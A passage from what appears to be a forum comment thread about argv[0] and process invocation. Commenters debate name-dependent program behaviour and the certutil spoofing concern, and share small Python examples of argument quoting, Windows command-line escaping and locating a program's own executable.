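    return shlex.join(argv)


if __name__ == "__main__":
    print(render_naive(SPOOFED_ARGV))
    print(render_quoted(SPOOFED_ARGV))
```

With quoting, the fake pipeline shows up as a single odd-looking argv[0] instead of blending into the rest of the line.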
Not only is there a Wikipedia article on it, there's more than one.
Here's the one covering science and engineering, which is the appropriate version for this discussion.
https://en.wikipedia.org/wiki/Intrinsic_and_extrinsic_proper...
Also claiming that the Windows API to call a new process is good… wow… I guess he's never had to pass a filename with quotes and spaces in its name. The API expects you to do the escaping yourself. Yes it needs to be escaped, because it's all one single string.
A side effect of that is that programs do their own unescaping. Unix users who are used to quotes being stripped for them may be surprised by this.
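To illustrate the escaping burden: Python's subprocess module ships `list2cmdline`, the helper it uses on Windows to flatten an argument list into one command-line string following the Microsoft C runtime rules. This sketch just wraps it (the wrapper name is made up). The caveat is that the result only round-trips for programs that parse their command line with those same rules.

```python
import subprocess


def build_command_line(args):
    """Flatten an argument list into a single string using MS C runtime quoting."""
    return subprocess.list2cmdline(args)


if __name__ == "__main__":
    # Spaces force surrounding quotes; embedded quotes are backslash-escaped.
    print(build_command_line(["type", "my file.txt"]))
    print(build_command_line(["prog", 'say "hi"']))
```

On Unix the list would be handed to the child as-is, with no flattening step at all.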
One can then guess what the PYTHONPATH and LD_LIBRARY_PATH should be most of the time and save someone from having to set them.
Obviously this is of most use when you're running something you've installed into /opt (e.g. /opt/myprog/bin, /opt/myprog/lib etc) or are running it from the source tree.
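Roughly what that guessing could look like, as a Python sketch. The bin/ and lib/ layout follows the /opt/myprog example; the lib/python subdirectory and the function name `guess_env` are assumptions for illustration only.

```python
import os


def guess_env(exe_path):
    """Guess library search paths from where the executable lives."""
    bin_dir = os.path.dirname(os.path.abspath(exe_path))
    prefix = os.path.dirname(bin_dir)  # e.g. /opt/myprog for /opt/myprog/bin/myprog
    return {
        "LD_LIBRARY_PATH": os.path.join(prefix, "lib"),
        # Hypothetical layout: Python modules under <prefix>/lib/python.
        "PYTHONPATH": os.path.join(prefix, "lib", "python"),
    }


if __name__ == "__main__":
    print(guess_env("/opt/myprog/bin/myprog"))
```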
Not in general it doesn't. Convention for shells is to pass the string the user used to invoke the program, which may be an absolute path, a relative path or just a filename resolved against $PATH.
> this enables all sorts of binaries that work out where their dependencies are relative to their original binary
You should use the OS-specific functions to retrieve the current executable path for that - GetModuleFileName(NULL, ...) on Windows and readlink("/proc/self/exe", ...) on Linux. For scripts, look into your interpreter documentation - e.g. Bash has ${BASH_SOURCE[0]}. Unfortunately POSIX shell scripts are SOL and have to rely on $0 plus some $PATH searching.
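A Python sketch of both approaches, with made-up function names. One caveat: in a Python script, /proc/self/exe points at the interpreter, not the script, so treat this as an illustration of the two lookups rather than a drop-in helper. The fallback to `sys.executable` on systems without /proc is my own choice.

```python
import os
import shutil
import sys


def resolve_argv0(argv0, path=None):
    """Best-effort guess from argv[0] alone: the '$0 plus $PATH search' approach."""
    if os.sep in argv0:
        # Absolute or relative path: resolve against the current directory.
        return os.path.abspath(argv0)
    # Bare name: search $PATH (returns None if nothing matches).
    return shutil.which(argv0, path=path)


def current_executable():
    """Ask the OS instead of trusting argv[0] (Linux-specific /proc lookup)."""
    try:
        return os.readlink("/proc/self/exe")
    except OSError:
        # Assumption: fall back to the interpreter path where /proc is missing.
        return sys.executable


if __name__ == "__main__":
    print(current_executable())
    print(resolve_argv0(sys.argv[0]))
```

The first function can be fooled by whoever launched the process; the second cannot, at least not through argv.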
If we want something to be used in the security field, the design should account for that from day 0. Trying to retrofit something will break a lot of things.
Nope.
> Should a program be allowed to behave differently based on its name?
Yes. The program can also inspect any other part of its environment, including the parent process. What makes sense to inspect here depends on the particular program in question. The symlink example is still useful today.
> From a 2020s standpoint, this seems highly undesirable
Nope.
> it makes software less predictable
It doesn't. It makes it more predictable if programs can easily provide compatibility interfaces. Yes, you could do the same with a wrapper but removing friction matters.
> and goes against modern design principles.
Then modern design principles can take a hike.
> Today however, disk space is no longer considered an issue
It should be considered an issue though. I buy better hardware to get more use out of it, not for lazy developers to needlessly piss it all away.
This is just yet another example of "security" people trying to make their lives easier by making others' lives harder. And as usual it's only theater since almost all of the "exploits" apply to arguments as well, which for many programs provide plenty of opportunity to include arbitrary strings. Fix your tools instead of expecting the world to work around their limitations.
Tell me you don’t use Docker without telling me you don’t use Docker.
I’d argue the certutil problem the author mentions is a flaw in certutil, not argv’s fault. Doesn’t that mean it falls to symlinks as well?
If you look at sudo, it’s generally deny by default. Rename a program all you want, you won’t get to use it unless you can overwrite a program that is in the sudoer file. So I don’t know what nonsense certutil is playing at if it’s using argv to do its job. That’s appalling.
There is life outside the enterprise security theater.